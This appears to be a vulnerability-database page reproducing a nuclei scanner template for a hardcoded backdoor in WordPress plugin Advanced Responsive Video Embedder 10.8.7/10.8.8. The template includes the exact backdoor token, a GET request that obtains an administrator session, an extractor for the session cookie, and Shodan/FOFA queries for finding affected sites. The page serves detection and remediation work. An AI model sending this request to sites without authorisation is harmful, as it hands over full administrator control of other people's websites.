Lucene search
+L

Advanced Responsive Video Embedder 10.8.7/10.8.8 - Hardcoded Backdoor Authentication Bypass

🗓️ 18 Sep 2026 02:05:00Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Unauthenticated hardcoded backdoor in Advanced Responsive Video Embedder via _wplogin grants admin.

Related
Refs
Code
id: CVE-2026-18072

info:
  name: Advanced Responsive Video Embedder 10.8.7/10.8.8 - Hardcoded Backdoor Authentication Bypass
  author: str4k3r
  severity: critical
  description: |
    The compromised Advanced Responsive Video Embedder WordPress plugin releases 10.8.7 and 10.8.8 accept a hardcoded token through the `_wplogin` parameter and establish an authenticated administrator session before normal authentication. A single unauthenticated GET request triggers the backdoor. This template only inspects the redirect and session-cookie response and does not perform any administrative action.
  impact: |
    An unauthenticated attacker gains a full administrator session on the WordPress site, allowing complete takeover including plugin/theme editing, arbitrary PHP execution, and data theft.
  remediation: |
    Immediately remove the Advanced Responsive Video Embedder plugin versions 10.8.7 and 10.8.8, reinstall a known-clean release, rotate all secrets and passwords, and audit for rogue administrator accounts and web shells created after the backdoor was published.
  reference:
    - https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/
    - https://plugins.trac.wordpress.org/browser/advanced-responsive-video-embedder/tags/10.8.7/php/fn-update-check.php
    - https://nvd.nist.gov/vuln/detail/CVE-2026-18072
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-18072
    epss-score: 0.00878
    epss-percentile: 0.57256
    cwe-id: CWE-798
  metadata:
    verified: true
    max-request: 1
    vendor: advanced-responsive-video-embedder
    product: advanced-responsive-video-embedder
    framework: wordpress
    shodan-query: http.html:"advanced-responsive-video-embedder"
    fofa-query: body="advanced-responsive-video-embedder"
  tags: cve,cve2026,wordpress,wp-plugin,wp,backdoor,authbypass,unauth,arve

http:
  - method: GET
    path:
      - "{{BaseURL}}/?_wplogin=35fe7057ffed92ff7bc5a0b90f302a77fb5843ad6c972294d68da0b0553b3900"

    redirects: false

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/wp-admin/"

      - type: regex
        part: header
        regex:
          - "(?i)set-cookie:\\s*wordpress_logged_in_[a-f0-9]{32}="

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        part: header
        group: 1
        regex:
          - "(?i)wordpress_logged_in_[a-f0-9]{32}=([^;]+)"
# digest: 4b0a00483046022100fc00020880e39e9695385480e7f85ac98055760665af2b8bb74cd5044ccb9838022100d580cce1e86efebc7e2b0fb69df41cb6c2c2e0855349df220fb96fa27fc8edd2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation